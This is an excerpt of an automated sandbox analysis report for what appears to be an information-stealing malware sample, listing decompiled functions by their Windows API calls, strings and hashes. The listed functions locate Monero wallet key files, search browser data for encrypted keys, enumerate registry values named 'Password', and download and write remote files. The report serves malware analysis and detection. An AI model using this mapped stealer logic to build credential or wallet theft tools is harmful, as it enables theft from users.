                          • Part of subcall function 01006280: HttpOpenRequestA.WININET(00000000,GET,?,0189E020,00000000,00000000,00400100,00000000), ref: 01006385
                          • Part of subcall function 01006280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 010063BF
                          • Part of subcall function 01006280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 010063D1
                          • Part of subcall function 0101A8A0: lstrcpy.KERNEL32(?,01020E17), ref: 0101A905
                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 01015318
                        • lstrlen.KERNEL32(00000000), ref: 0101532F
                          • Part of subcall function 01018E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 01018E52
                        • StrStrA.SHLWAPI(00000000,00000000), ref: 01015364
                        • lstrlen.KERNEL32(00000000), ref: 01015383
                        • lstrlen.KERNEL32(00000000), ref: 010153AE
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                        • API String ID: 3240024479-1526165396
                        • Opcode ID: 1ffbd54b819cc7739108674ef2fc06f51c1fd167eed788f6d405f4b5d64ced12
                        • Instruction ID: a0ecfb71256971907f52b92babdbf04f34d9b68b7908e1a25748640e09902b91
                        • Opcode Fuzzy Hash: 1ffbd54b819cc7739108674ef2fc06f51c1fd167eed788f6d405f4b5d64ced12
                        • Instruction Fuzzy Hash: D7513030A1118ADBDB18FF60CD95AED7779AF20311F504018F8879B594EF386B0ACBA1
                        Function 010112D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpylstrlen
                        • String ID:
                        • API String ID: 2001356338-0
                        • Opcode ID: de93d88b10c2cabd61461cb17687f9afa4f1afff2010af9037c51b40e9db28e8
                        • Instruction ID: 6a03e786c554153e3afdcf72d6c233013de4d85d349a48fae536941b616b1bc5
                        • Opcode Fuzzy Hash: de93d88b10c2cabd61461cb17687f9afa4f1afff2010af9037c51b40e9db28e8
                        • Instruction Fuzzy Hash: BBC1B7B5A412199BCB14EF60DC88FDE7378BF64304F0045D9E54AA7244EB78AA85CF90
                        Function 01014280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 01018DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 01018E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 010142EC
                        • lstrcat.KERNEL32(?,0189E488), ref: 0101430B
                        • lstrcat.KERNEL32(?,?), ref: 0101431F
                        • lstrcat.KERNEL32(?,0189CF30), ref: 01014333
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                          • Part of subcall function 01018D90: GetFileAttributesA.KERNEL32(00000000,?,01001B54,?,?,0102564C,?,?,01020E1F), ref: 01018D9F
                          • Part of subcall function 01009CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 01009D39
                          • Part of subcall function 010099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 010099EC
                          • Part of subcall function 010099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 01009A11
                          • Part of subcall function 010099C0: LocalAlloc.KERNEL32(00000040,?), ref: 01009A31
                          • Part of subcall function 010099C0: ReadFile.KERNEL32(000000FF,?,00000000,0100148F,00000000), ref: 01009A5A
                          • Part of subcall function 010099C0: LocalFree.KERNEL32(0100148F), ref: 01009A90
                          • Part of subcall function 010099C0: CloseHandle.KERNEL32(000000FF), ref: 01009A9A
                          • Part of subcall function 010193C0: GlobalAlloc.KERNEL32(00000000,010143DD,010143DD), ref: 010193D3
                        • StrStrA.SHLWAPI(?,0189E470), ref: 010143F3
                        • GlobalFree.KERNEL32(?), ref: 01014512
                          • Part of subcall function 01009AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,01004EEE,00000000,00000000), ref: 01009AEF
                          • Part of subcall function 01009AC0: LocalAlloc.KERNEL32(00000040,?,?,?,01004EEE,00000000,?), ref: 01009B01
                          • Part of subcall function 01009AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,01004EEE,00000000,00000000), ref: 01009B2A
                          • Part of subcall function 01009AC0: LocalFree.KERNEL32(?,?,?,?,01004EEE,00000000,?), ref: 01009B3F
                        • lstrcat.KERNEL32(?,00000000), ref: 010144A3
                        • StrCmpCA.SHLWAPI(?,010208D1), ref: 010144C0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 010144D2
                        • lstrcat.KERNEL32(00000000,?), ref: 010144E5
                        • lstrcat.KERNEL32(00000000,01020FB8), ref: 010144F4
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                        • String ID:
                        • API String ID: 3541710228-0
                        • Opcode ID: f199dc34192535353bcbc13a881afa163e2a87e43a5708e056773019c9066dcf
                        • Instruction ID: b453b5aca1d03e580c2885f76c0adb69ea48807cfeb17f52b37f72ffd0e294aa
                        • Opcode Fuzzy Hash: f199dc34192535353bcbc13a881afa163e2a87e43a5708e056773019c9066dcf
                        • Instruction Fuzzy Hash: E171A8B6D00209ABDB14EBE0EC89FEE7379BB58304F048598E64697184EB34DB45CF91
                        Function 01001310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 010012A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 010012B4
                          • Part of subcall function 010012A0: RtlAllocateHeap.NTDLL(00000000), ref: 010012BB
                          • Part of subcall function 010012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 010012D7
                          • Part of subcall function 010012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 010012F5
                          • Part of subcall function 010012A0: RegCloseKey.ADVAPI32(?), ref: 010012FF
                        • lstrcat.KERNEL32(?,00000000), ref: 0100134F
                        • lstrlen.KERNEL32(?), ref: 0100135C
                        • lstrcat.KERNEL32(?,.keys), ref: 01001377
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                          • Part of subcall function 0101A9B0: lstrlen.KERNEL32(?,01899068,?,\Monero\wallet.keys,01020E17), ref: 0101A9C5
                          • Part of subcall function 0101A9B0: lstrcpy.KERNEL32(00000000), ref: 0101AA04
                          • Part of subcall function 0101A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0101AA12
                          • Part of subcall function 0101A8A0: lstrcpy.KERNEL32(?,01020E17), ref: 0101A905
                          • Part of subcall function 01018B60: GetSystemTime.KERNEL32(01020E1A,0189A6C0,010205AE,?,?,010013F9,?,0000001A,01020E1A,00000000,?,01899068,?,\Monero\wallet.keys,01020E17), ref: 01018B86
                          • Part of subcall function 0101A920: lstrcpy.KERNEL32(00000000,?), ref: 0101A972
                          • Part of subcall function 0101A920: lstrcat.KERNEL32(00000000), ref: 0101A982
                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 01001465
                          • Part of subcall function 0101A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0101A7E6
                          • Part of subcall function 010099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 010099EC
                          • Part of subcall function 010099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 01009A11
                          • Part of subcall function 010099C0: LocalAlloc.KERNEL32(00000040,?), ref: 01009A31
                          • Part of subcall function 010099C0: ReadFile.KERNEL32(000000FF,?,00000000,0100148F,00000000), ref: 01009A5A
                          • Part of subcall function 010099C0: LocalFree.KERNEL32(0100148F), ref: 01009A90
                          • Part of subcall function 010099C0: CloseHandle.KERNEL32(000000FF), ref: 01009A9A
                        • DeleteFileA.KERNEL32(00000000), ref: 010014EF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                        • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                        • API String ID: 3478931302-218353709
                        • Opcode ID: 0f3816801e094d86c69e5a0e576e4ecd6b3b15150ee03d42472797bf3f84f703
                        • Instruction ID: a829595f01a34f59a4c7279a3dcbc5a96f454a68c2b36a9ca1e705262f78e652
                        • Opcode Fuzzy Hash: 0f3816801e094d86c69e5a0e576e4ecd6b3b15150ee03d42472797bf3f84f703
                        • Instruction Fuzzy Hash: 695175B1E5015A97DB15FB60DD94FED733CAF64200F404198A64AA7084EF346B8ACBA5
                        Function 010075D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 010072D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0100733A
                          • Part of subcall function 010072D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 010073B1
                          • Part of subcall function 010072D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0100740D
                          • Part of subcall function 010072D0: GetProcessHeap.KERNEL32(00000000,?), ref: 01007452
                          • Part of subcall function 010072D0: HeapFree.KERNEL32(00000000), ref: 01007459
                        • lstrcat.KERNEL32(00000000,010217FC), ref: 01007606
                        • lstrcat.KERNEL32(00000000,00000000), ref: 01007648
                        • lstrcat.KERNEL32(00000000, : ), ref: 0100765A
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0100768F
                        • lstrcat.KERNEL32(00000000,01021804), ref: 010076A0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 010076D3
                        • lstrcat.KERNEL32(00000000,01021808), ref: 010076ED
                        • task.LIBCPMTD ref: 010076FB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                        • String ID: :
                        • API String ID: 2677904052-3653984579
                        • Opcode ID: f2ead8fe97bd5fb0dbc60047bef94966965c58fb90272e51e011fab813603223
                        • Instruction ID: 3b151a0d129b7c9329f75b9a72f9343c7ee4567ec3c92ccf1d339d26fea3da3d
                        • Opcode Fuzzy Hash: f2ead8fe97bd5fb0dbc60047bef94966965c58fb90272e51e011fab813603223
                        • Instruction Fuzzy Hash: 60311C79D4010ADFEB15EBE4EC98DFE7779FB98301F104119E143A7284DA34A946CB50
                        Function 01018100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0189E200,00000000,?,01020E2C,00000000,?,00000000), ref: 01018130
                        • RtlAllocateHeap.NTDLL(00000000), ref: 01018137
                        • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 01018158
                        • __aulldiv.LIBCMT ref: 01018172
                        • __aulldiv.LIBCMT ref: 01018180
                        • wsprintfA.USER32 ref: 010181AC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                        • String ID: %d MB$@
                        • API String ID: 2774356765-3474575989
                        • Opcode ID: 17182e0337b497cdf5b07b4525ff863fd30026e8dff9f4d0d65d179115e89c0f
                        • Instruction ID: 7f4ca11ea37908840482c2216e7234b1db1a31621e9d14d607241a1276abb9a7
                        • Opcode Fuzzy Hash: 17182e0337b497cdf5b07b4525ff863fd30026e8dff9f4d0d65d179115e89c0f
                        • Instruction Fuzzy Hash: 70212EB1E44219ABDB10DFD5DC49FAEB7B8FB44B10F104609F605BB284D77869008BA5
                        Function 010060A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0101A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0101A7E6
                          • Part of subcall function 010047B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 01004839
                          • Part of subcall function 010047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 01004849
                        • InternetOpenA.WININET(01020DF7,00000001,00000000,00000000,00000000), ref: 0100610F
                        • StrCmpCA.SHLWAPI(?,0189EAC8), ref: 01006147
                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0100618F
                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 010061B3
                        • InternetReadFile.WININET(?,?,00000400,?), ref: 010061DC
                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0100620A
                        • CloseHandle.KERNEL32(?,?,00000400), ref: 01006249
                        • InternetCloseHandle.WININET(?), ref: 01006253
                        • InternetCloseHandle.WININET(00000000), ref: 01006260
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                        • String ID:
                        • API String ID: 2507841554-0
                        • Opcode ID: 270e2704b71ec7b864d8115443bfbf5a3c2f134b535b20a23126ab2b45d4917d
                        • Instruction ID: f983d316913c964a48c9257ae9c3b3c08f8c3d2ba88892e562372cf2a9498f9e
                        • Opcode Fuzzy Hash: 270e2704b71ec7b864d8115443bfbf5a3c2f134b535b20a23126ab2b45d4917d
                        • Instruction Fuzzy Hash: D05170B1A40219EBEB25DF50DC48BEE77B9FB44701F008098E646A71C4DB756B89CF94
                        Function 010072D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                        Download Yara Rule
                        APIs
                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0100733A
                        • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 010073B1
                        • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0100740D
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 01007452
                        • HeapFree.KERNEL32(00000000), ref: 01007459
                        • task.LIBCPMTD ref: 01007555
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1778961954.0000000001001000.00000040.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                        • Associated: 00000000.00000002.1778948540.0000000001000000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.00000000010E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1778961954.000000000124A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000013E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779111781.00000000014F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779344711.00000000014F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779450895.0000000001688000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1779466575.0000000001689000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$EnumFreeOpenProcessValuetask
                        • String ID: Password
                        • API String ID: 775622407-3434357891
                        • Opcode ID: 8f086a12fe0abd587a35f01fb38e5cc3346980282844a0c7d35e07b3ac87e62e
                        • Instruction ID: 36f413ef9ca2f524f4176d601186246ad039490da08b02e2083d7daa0699ecba
                        • Opcode Fuzzy Hash: 8f086a12fe0abd587a35f01fb38e5cc3346980282844a0c7d35e07b3ac87e62e
                        • Instruction Fuzzy Hash: D9614DB5C001699BEB25DB50DC44BD9B7B8BF54300F0081E9E6C9A6185DFB46BC9CF90
                        Function 0100BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0101A740: lstrcpy.KERNEL32(01020E17,00000000), ref: 0101A788
                          • Part of subcall function 0101A9B0: lstrlen.KERNEL32(?,01899068,?,\Monero\wallet.keys,01020E17), ref: 0101A9C5
                          • Part of subcall function 0101A9B0: lstrcpy.KERNEL32(00000000), ref: 0101AA04
                          • Part of subcall function 0101A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0101AA12
                          • Part of subcall function 0101A920: lstrcpy.KERNEL32(00000000,?), ref: 0101A972
                          • Part of subcall function 0101A920: lstrcat.KERNEL32(00000000), ref: 0101A982
                          • Part of subcall function 0101A8A0: lstrcpy.KERNEL32(?,01020E17), ref: 0101A905
                          • Part of subcall function 0101A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0101A7E6
                        • lstrlen.KERNEL32(00000000), ref: 0100BC9F
